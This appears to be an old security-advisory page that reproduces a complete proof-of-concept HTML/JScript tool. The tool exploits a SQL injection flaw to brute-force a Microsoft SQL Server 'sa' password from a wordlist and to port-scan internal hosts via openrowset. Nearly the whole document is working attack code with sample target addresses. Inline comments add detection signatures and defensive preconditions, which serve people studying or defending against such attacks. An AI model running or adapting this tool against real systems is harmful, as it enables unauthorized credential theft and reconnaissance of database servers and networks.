MS SQL Server Passwords Bruteforce via SQL Injection (PoC) — Credit:
The information has been provided by offtopic.
The original article can be found at: http://www.securitylab.ru/_tools/2005/05/sqlbrut.zip
Details
Based on the article linked in our previous article, Manipulating Microsoft SQL Server Using SQL Injection, the following tool uses a SQL injection vulnerability to brute force MS SQL's sa password.
Tool:
< html>
< h3>
MS SQL Server passwords bruteforce PoC via SQL Injection
< /h3>
(c)oded by Sergey V. Gordeychik 2005< br>
< a href=mailto: offtopic@mail.ru>offtopic@mail.ru< /a>
< hr>
< table>
< tr>
< td>
URL with injection:
< /td>
< td>
< input type=text Value="http://200.4.4.106/inject.asp?id=1;< ***>" id=baseurl>
< /td>
< tr>
< td>
Passwords file:
< /td>
< td>
< input type=text Value="passwords.txt" id=passwords>
< /td>
< /table>
< input type=button Value="Start" onclick="brut();">
< hr>
< h3>
Network port scanner via SQL Injection
< /h3>
< hr>
< table>
< tr>
< td>
Server:
< /td>
< td>
< input type=text Value="200.4.4.6" id=server>
< tr>
< td>
Port to scan:
< /td>
< td>
< input type=text Value="445" id=port>
< /table>
< input type=button Value="Check" onclick="scan();">
< hr>
< a id="status">< /a>
< script language="JScript">
// Synchronous MSXML transport (IE/JScript ActiveX only); every probe below is a blocking GET.
var xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
// Injected statement template. The '.' (server) and 'pass' (password) tokens are substituted with
// String.replace, which swaps only the first occurrence of a string pattern.
// The whole technique depends on three conditions a defender can remove independently: the page
// concatenating the id parameter into SQL, the injecting login being permitted to run openrowset
// (on SQL Server 2005 and later this is the "Ad Hoc Distributed Queries" option, off by default),
// and the OLE DB provider's error text being echoed back in the HTTP response.
var inject = "select * from openrowset('SQLOLEDB','.';'sa';'pass','select 1')"
// Probes host:port from the database server's network position by pointing openrowset at it and
// classifying the provider error that comes back in the HTTP response.
// x: raw response body; s: first the request URL, then reused for the status label.
function scan()
{
// Substitutes "server,port" for the '.' placeholder, then splices the statement into the URL at the <***> marker.
var x,s = inject.replace(".", document.getElementById("server").value + "," + document.getElementById("port").value);
s = document.getElementById("baseurl").value.replace("< ***>", s);
xmlhttp.Open("GET", s, false);
xmlhttp.Send();
x = xmlhttp.responseText;
// Classification keys on verbatim SQL Server / OLE DB error strings leaked through the web page
// (indexOf(...)>=1 does not count a match at offset 0). Returning a generic error page instead of
// the DB error text defeats this classification; the three strings are usable log signatures.
if (x.indexOf("SQL Server does not exist")>=1) s="closed"; else
if (x.indexOf("Timeout expired")>=1) s="filtered or unreachable"; else
if (x.indexOf("Login failed")>=1) s="SQL Server detected."; else s="open";
document.getElementById("status").innerHTML="Scaned " + document.getElementById("server").value + ":" + document.getElementById("port").value + ".Port status:< b>"+s;
}
// One password attempt: substitutes passwd for the 'pass' token, injects the statement through url
// and blocks on the GET. Returns 0 when the response contains "Login failed", otherwise 1 - so any
// response without that string (generic error page, timeout) is reported as a hit.
// Each call is one failed sa login on the SQL Server itself; that "Login failed for user" event in
// the SQL Server error log / login audit is the server-side detection point.
function checkpass(url, passwd)
{
var s = inject.replace("pass", passwd);
s = url.replace("< ***>", s);
xmlhttp.Open("GET", s, false);
xmlhttp.Send();
if (xmlhttp.responseText.indexOf("Login failed")>=1) return 0; else
{
return 1;
}
}
// Dictionary loop: reads the password file named in the form through Scripting.FileSystemObject
// (again IE/ActiveX only), tries each line via checkpass and updates the status every 10th line.
// Returns 0 on the first accepted password; otherwise falls through to the failure message.
// The file handle f is never Close()d.
// Server side this is one request per line, synchronous and back-to-back, each producing a failed
// sa login - a burst of "Login failed" events from one web server is the audit signature, and the
// openrowset('SQLOLEDB' fragment in the query string is the request-level signature.
function brut()
{
document.getElementById("status").innerHTML="Starting...";
var fso, f, pass, baseurl, passwords, i
fso = new ActiveXObject("Scripting.FileSystemObject");
baseurl=document.getElementById("baseurl").value;
passwords=document.getElementById("passwords").value;
// OpenTextFile(path, 1): mode 1 is ForReading.
f = fso.OpenTextFile(passwords, 1);
i = 0;
while (!f.AtEndOfStream)
{
pass = f.ReadLine();
i=i+1;
// Progress is only shown on every 10th candidate.
if (!(i % 10))
{
document.getElementById("status").innerHTML="Trying password N"+i+" < b>"+pass+"< /b>";
}
if (checkpass(baseurl, pass))
{
document.getElementById("status").innerHTML="SA password is '< b>"+pass+"< /b>'. Checked "+i+" passwords";
return 0;
};
}
document.getElementById("status").innerHTML="Ooopssss.... May be next time";
}
< /script>